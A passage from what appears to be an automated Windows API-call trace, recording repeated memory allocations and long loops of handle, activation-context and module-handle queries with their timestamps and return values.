dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.067] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.401] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.403] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.413] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.414] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.425] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.427] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0090.636] VirtualFree (lpAddress=0x3480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.638] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3480000 [0091.999] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0091.999] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.000] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.000] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.000] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.000] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.000] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.000] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.001] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.001] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.001] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.001] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.001] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.001] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.001] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.002] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.002] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.002] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.002] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.002] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.002] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.002] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.002] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.003] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.003] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.003] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.003] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.004] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.004] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.004] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.004] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.004] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.004] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.005] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.005] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.005] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.005] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.005] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.005] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.005] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.005] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.006] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.006] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.006] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.006] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.006] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.006] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.006] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.007] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.007] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.007] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.007] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.007] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.007] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.007] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.007] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.008] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.008] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.008] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.008] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.008] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.008] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.008] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.009] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.009] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.009] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.009] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.009] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.009] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.009] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.009] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.010] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.010] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.010] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.010] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.010] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.010] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.010] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.010] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.010] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.011] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.011] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.011] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.011] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.011] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.011] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.011] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.011] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.012] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.012] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.012] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.012] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.012] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.012] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.012] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.013] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.013] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.013] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.013] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.013] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.013] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.014] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.014] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.014] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.014] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.014] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.014] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.014] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.014] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.014] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.015] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.015] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.015] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.015] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.015] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.015] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.015] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.101] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.101] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.101] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.101] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.101] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.102] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.102] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.102] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.102] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.102] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.102] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.102] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.102] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.102] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.103] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.103] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.103] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.103] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.104] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.104] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.104] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.104] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.104] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.104] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.106] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.106] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.106] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.106] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.106] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.106] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.106] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.106] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.107] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.107] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.107] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.107] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.107] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.107] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.107] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.108] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.108] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.108] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.108] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.108] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.108] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.108] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.108] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.109] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.109] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.109] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.109] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.109] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.109] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.109] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.109] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.109] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.110] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.110] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.110] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.110] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.110] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.110] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.111] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.111] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.111] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.111] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.111] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.111] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.111] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.111] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.112] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.112] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.112] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.112] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.112] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.112] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.112] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.113] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.113] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.113] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.113] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.113] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.114] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.114] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.114] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.114] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.114] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.114] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.114] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.115] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.115] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.115] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.115] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.115] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.115] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.116] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.116] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.116] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.116] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.116] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.116] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.116] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.116] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.116] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.117] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.117] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.117] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.117] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.117] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.117] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.117] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.117] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.118] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.118] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.118] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.118] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.118] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.118] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.118] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.119] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.119] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.119] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.119] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.119] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.119] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.119] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.119] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.119] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.120] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.120] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.120] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.120] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.120] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.120] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.120] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.120] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.120] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.121] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.121] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.121] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.121] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.121] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.121] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.121] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.121] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.121] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.122] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.122] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.122] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.122] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.122] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.122] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.122] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.122] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.122] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.123] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.123] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.123] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.123] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.123] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.123] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.123] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.123] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.123] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.124] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.124] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.124] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.124] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.124] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.124] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.124] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.124] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.124] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.125] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.125] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.125] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.125] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.125] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.125] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.125] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.125] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.125] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.126] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.126] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: 